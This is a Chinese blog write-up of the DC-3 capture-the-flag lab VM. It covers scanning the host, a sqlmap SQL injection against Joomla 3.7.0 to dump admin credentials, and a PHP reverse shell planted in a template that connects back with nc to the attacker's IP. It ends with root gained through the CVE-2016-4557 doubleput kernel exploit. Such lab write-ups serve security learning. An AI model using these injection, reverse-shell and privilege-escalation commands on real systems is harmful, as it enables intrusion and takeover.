DC靶机系列:DC-3

2023-10-27

一、信息收集

  1. 查询本机ip及目标靶机ip

本机ip:192.168.56.104,利用nmap查询同网段存活的ip,或者使用arp-scan -l

靶机ip为:192.168.56.112,下一步收集靶机开放的端口信息

  1. 收集靶机开放端口

输入nmap -sS -sV -T5 -A 192.168.56.112 搜索相应开放的端口及服务还有版本

发现只有80端口,同时也发现了个Joomla的cms框架,该框架最新的cve-2023-23752,将在后面更新,一个未授权访问漏洞,Joomla! CMS 版本4.0.0 - 4.2.7中由于对web 服务端点访问限制不当,可能导致未授权访问Rest API,造成敏感信息泄露(如数据库账号密码等)。鉴于该漏洞影响较大,建议客户尽快做好自查及防护。

  1. 对应端口进行尝试

这里介绍一个新工具joomscan,后面将会和wpscan同时更新一篇文章,这里就先利用了

输入joomscan --url 192.168.56.112

检测到了很多目录,浏览器输入地址后发现

这里说,该靶机仅有一个flag,应该是需要提权后才可以查看的到,这边发现了个登录框,去漏洞库里查找下看是否存在sql注入的漏洞

二、Web渗透

输入searchsploit joomla 3.7.0 -w,如果不知道如何利用,可以看后面的url,里面有方式

直接上sqlmap,进行注入

sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

发现了joomladb的数据库,继续报数据表

sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables

爆出来了n多张表,这里,根据users表,爆出用户名和密码

sqlmap -u " http://192.168.56.112/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -T '#__users' -C name,password --dump

发现了admin用户和它的password,将password复制粘贴到一个txt文档中,进行密码破解

我这边已经破解过了,用户名admin、密码snoopy

登陆后,就要开始寻找有没有可以getshell的地方,这类的cms肯定是有上传文件的地方,这里可以上传一个一句话木马,用蚁剑进行连接,也可以写一个php,反弹shell到我们的攻击机上,这边,经过寻找发现了有个templates的beez3的目录

新建个shell.php文件,然后去网上找个反弹shell脚本或者自己简单的写一个

<?php 
system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.104 4444 >/tmp/f');
?> 

然后保存该文件,在终端nc -vlp 4444端口,网页访问/templates/beez3/shell.php,即可反弹一个低权限的shell,然后键入

python -c 'import pty;pty.spawn("/bin/bash")'

获取到了低权限的下一步就是提权了,首先搜集有关靶机的信息,输入

uname -a
lsb_release -a

发现ubuntu 16.04 4.4.0,在本地终端搜索相关的exp

searchsploit ubuntu 16.04 4.4.x -w

打开后面的url,可以知晓如何使用该exp

下载这个39772.zip到本地,并且解压

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

在本地开启http.server服务,在shell中下载攻击机上下载的39772.zip压缩包

使用unzip解压后得到39772文件夹,里面还有两个tar的压缩包,使用tar -xvf exploit.tar

解压后进入该文件夹,运行./compile.sh,会编译出doubleput可执行文件,然后./doubleput即可提权为root

在root目录下即可获得flag,本次DC项目的第三台靶机渗透结束。

注意:Linux kernel replace_map_fd_with_map_ptr拒绝服务漏洞(CVE-2016-4557)

Linux Kernel是Linux操作系统的内核。

Linux kernel 4.5.5之前版本,kernel/bpf/verifier.c/replace_map_fd_with_map_ptr未正确维护fd数据结构,存在安全漏洞,可使本地用户造成拒绝服务或提升权限。

每天学习一丢丢,进步一丢丢!!

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

DC靶机系列:DC-3 的相关文章

  • JavaFX技巧3:使用回调接口

    作为UI框架开发人员 提供自定义控件外观和行为的方法是我工作的一部分 在许多情况下 这是通过允许框架用户在控件上注册工厂来完成的 过去 我会为此创建一个工厂接口 并在框架内提供一个或多个默认实现 这些事情在JavaFX中的处理方式有所不同
  • 短视频矩阵管理系统私信群聊功能源码开发分享

    短视频获客工具的兴起 也有越来越多的企业及商家在发现了更多商机 除了在做短视频推广获客的同时 也有不少意向客户潜藏在评论区需要我们深度挖掘 那么对于一些流量比较高的账号 想在成千上万的评论区里挖掘意向客户 还是挺消耗人力的 那么一款自动化获
  • VMware虚拟机官网下载安装,虚拟机中安装Linux系统CentOS7(图文详解)

    虚拟机的安装下载和用法 第一章 VMware下载 第二章 以VMware12为例安装虚拟机 第三章 虚拟机安装Linux的CentOS7 第四章 CentOS系统设置 第五章 查看网络是否连接成功 友情提醒 先看文章目录 大致了解文章知识点
  • vue自定义指令

    除了核心功能默认内置的指令 v model 和 v show Vue 也允许注册自定义指令 有的情况下 对普通 DOM 元素进行底层操作 这时候就会用到自定义指令 下面定义了一个v test指令绑定数据name

随机推荐

  • 【Python】函数与模块

    函数的引入和定义 首先我们先来明确为什么Python中引入函数的概念 函数就是一部分代码模块 将这部分写好的代码模块封装成一个函数 这个函数具有你所编写的特定功能 并且以后使用时还可以调用 举个例子 就是一套你总结出来的公式 以后需要时还可
  • (一) Three.js 简介

    Three js 简介 源目录结构 组件
  • 西门子博途顺序控制车间皮带逆序停止程序

    自动控制要求 如果处于自动档 首先需要按下警示铃按钮 警示铃鸣5S后可以进行启动 如果自动档切到手动档 那么停止所有传送带并且重新鸣铃后可以进行手动测试 按下自动启动按钮后 1 5号传送带 按编号顺序启动 每次间隔五秒 如果启动过程中出现报
  • openGL之API学习(四十一)立方体贴图Cubemap

    基本上说cubemap它包含6个2D纹理 这每个2D纹理是一个立方体 cube 的一个面 也就是说它是一个有贴图的立方体 你可能会奇怪这样的立方体有什么用 为什么费事地把6个独立纹理结合为一个单独的纹理 只使用6个各自独立的不行吗 这是因为
  • Elasticsearch集群部署详解

    文章目录 Elasticsearch功能与特性 Elasticsearch 单节点安装部署 Elasticsearch 集群安装部署 附件 1 安装Java JDK 2 问题一 2 问题二 Elasticsearch功能与特性 1 分布式搜
  • SpringBoot拦截器Interceptor的使用-基础篇

    1 拦截器 Interceptor 简介 1 1 拦截器 Interceptor 介绍 拦截器是Spring中的概念 和过滤器类似 可以对用户请求进行拦截过滤处理 但是相对于过滤器而言 拦截器要的控制更加的细节 拦截器可以在三个地方进行执行
  • API是什么?深入探索编程中的应用接口

    在编程领域 API Application Programming Interface 应用程序编程接口 是指一组定义和规范了软件组件之间交互的方法和协议 它提供了一种编程接口 允许不同的软件系统之间进行通信和交互 API可以被看作是软件组
  • 函数模板与类模板的具体化

    这两天在学习 C primer 这本书时 发现有关函数与类模板的相关内容多且繁琐 而且容易混淆 因此决定写一篇博客 将它们的概念与之间的区别梳理一下 一 函数模板 在 C primer 一书中 函数模板的具体化包括了三个部分 显式具体化 隐
  • CVPR 2021|一个绝妙的想法:在类别不平衡的数据上施展半监督学习

    点击上方 视学算法 选择加 星标 或 置顶 重磅干货 第一时间送达 作者丨kid丶 知乎 已授权 来源丨https zhuanlan zhihu com p 360067653 编辑丨极市平台 CReST A Class Rebalanci
  • elasticsearch 设置seed hosts

    es集群中配置的seed hosts 通过seed hosts provider提供 provider的数据来源有集群配置文件和第三方插件提供 集群配置文件又有两种方式 一种是直接在elasticsearch yml配置文件中通过disco
  • Cocos Creator Android 平台 Facebook 原生登录

    在做海外项目中 经常需要接入Facebook SDK 现将CocosCreator Android 平台 Facebook 登录的接入流程记录下来 以备有需要的朋友做参考 一 准备工作 1 首先在facebook 开发者平台 注册账号 创建
  • MAC系统 WORD 如何调整自动序号的间隔距离

    在MAC big Sur系统中 安装OFFICE 后 遇到WORD排版时 自动序号的间隔距离太远 研究一段时间发现可以用以下方式解决 1 问题界面 二 解决步骤 选中文字后 点击右键 选择 段落 点击 制表符 点击 全部清除 点击 确定 最
  • 最长公共上升子序列(LCIS)

    目录 一 前言 二 最长公共上升子序列 1 问题描述 2 基本思路 1 状态表示 2 状态计算 三 题例 1 上链接 2 基本思路 3 代码 1 python未优化版 2 python优化版 一 前言 对于学计算机的同学来说 学习算法是一件
  • 【DockerCE】使用docker配置和运行HertzBeat

    HertzBeat是一款免Agent的监控平台 拥有强大自定义监控能力 可以对应用服务 中间件 数据库 操作系统 云原生等进行监控 配置监控告警阈值 以及告警通知 邮件 微信 钉钉 飞书 关于这个软件的介绍 我这里就不做过多的介绍了 感兴趣
  • (二)代码好坏判定

    好坏只是笼统的判定 好代码 易扩展 易读 简单 易维护 判断代码的角度 灵活性 flexibility 可扩展性 extensibility 可维护性 maintainability 可读性 readability 可理解性 underst
  • Linux多进程编程

    fork系统调用 include
  • scrapy爬虫的搭建过程(实战篇)

    scrapy爬虫的搭建过程 实战篇 1 爬虫功能 以 http bbs fengniao com forum forum 125 1 lastpost html 为起始页 爬取前十页的信息 包括文章的标题 链接地址和图片地址 保存到mong
  • 超详细!基于Proteus的简易测频计实现(数字电路课程设计)

    本文阐述基于Proteus 7 8的简易测频计电路的实现 附具体电路的工程文件下载 工程文件下载链接 设计要求 闸门时间1S 10S可选 读数保持时间10秒 可选 四位数字显示 范围000 1 9999 Hz 能够自动进行下一次测量 设计方
  • 关于null的typeof和instanceof

    问题 alert typeof null object alert null instanceof Object false 答案 这是由Javascript规范规定的 Null和Object都是javascript中的数据类型 Null数
  • DC靶机系列:DC-3

    一 信息收集 查询本机ip及目标靶机ip 本机ip 192 168 56 104 利用nmap查询同网段存活的ip 或者使用arp scan l 靶机ip为 192 168 56 112 下一步收集靶机开放的端口信息 收集靶机开放端口 输入